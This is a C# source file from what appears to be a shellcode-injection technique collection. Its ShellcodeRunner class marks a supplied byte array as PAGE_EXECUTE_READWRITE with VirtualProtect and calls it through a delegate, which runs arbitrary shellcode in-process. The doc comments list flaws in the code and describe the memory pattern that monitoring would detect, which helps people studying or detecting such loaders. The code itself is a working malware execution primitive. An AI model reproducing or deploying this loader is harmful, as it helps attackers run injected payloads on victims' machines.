ShellcodeRunner.cs
using System;
using System.Runtime.InteropServices;
using System.Diagnostics;
using static ShellcodeInjectionTechniques.Debugger;
using static ShellcodeInjectionTechniques.Native;
namespace ShellcodeInjectionTechniques
{
    /// <summary>
    /// <see cref="ITechnique"/> implementation that changes the protection of the
    /// caller-supplied byte array to PAGE_EXECUTE_READWRITE and invokes it through a delegate.
    /// </summary>
    /// <remarks>
    /// Review notes, all taken from the code in this class:
    /// <list type="bullet">
    /// <item>The <c>target</c> argument of <see cref="Run"/> is never read; the buffer is
    /// called directly from this method.</item>
    /// <item>The buffer is the managed array itself, pinned with <c>fixed</c>. The protection
    /// change is requested for <c>shellcode.Length</c> bytes starting at its first element.</item>
    /// <item>The result of <c>VirtualProtect</c> is discarded, so the "[+]" debug lines are
    /// written whether or not the protection change succeeded.</item>
    /// <item>The previous protection value is captured but never restored, so the region is
    /// left writable and executable after the call returns.</item>
    /// </list>
    /// For monitoring, the visible sequence is a protection change to
    /// PAGE_EXECUTE_READWRITE on array memory followed by a call through an unmanaged
    /// function pointer into that same region.
    /// </remarks>
    class ShellcodeRunner : ITechnique
    {
        // Parameterless, void-returning signature used to call the buffer's first byte.
        private delegate void ShellcodeDelegate();

        /// <summary>
        /// Pins <paramref name="shellcode"/>, requests PAGE_EXECUTE_READWRITE on it and calls it.
        /// </summary>
        /// <param name="target">Not used by this implementation.</param>
        /// <param name="shellcode">Bytes that are made executable and then invoked.</param>
        public void Run(Process target, byte[] shellcode)
        {
            unsafe
            {
                // Pin the array so its address stays valid for the rest of this block.
                fixed (byte* pinned = shellcode)
                {
                    IntPtr entryPoint = (IntPtr)pinned;

                    // NOTE(review): the return value is ignored and previousProtection is never used.
                    VirtualProtect(
                        entryPoint,
                        (UIntPtr)shellcode.Length,
                        MemoryProtection.PAGE_EXECUTE_READWRITE,
                        out MemoryProtection previousProtection);

                    string addressHex = entryPoint.ToString("X");
                    Debug("[+] VirtualProtect() - set to PAGE_EXECUTE_READWRITE, shellcode address: 0x{0}", new[] { addressHex });
                    Debug("[+] Executing shellcode - memory address: 0x{0}", new[] { addressHex });

                    // Wrap the raw address in a delegate and call it on the current thread.
                    Delegate wrapped = Marshal.GetDelegateForFunctionPointer(entryPoint, typeof(ShellcodeDelegate));
                    ShellcodeDelegate invoke = (ShellcodeDelegate)wrapped;
                    invoke();
                }
            }
        }
    }
}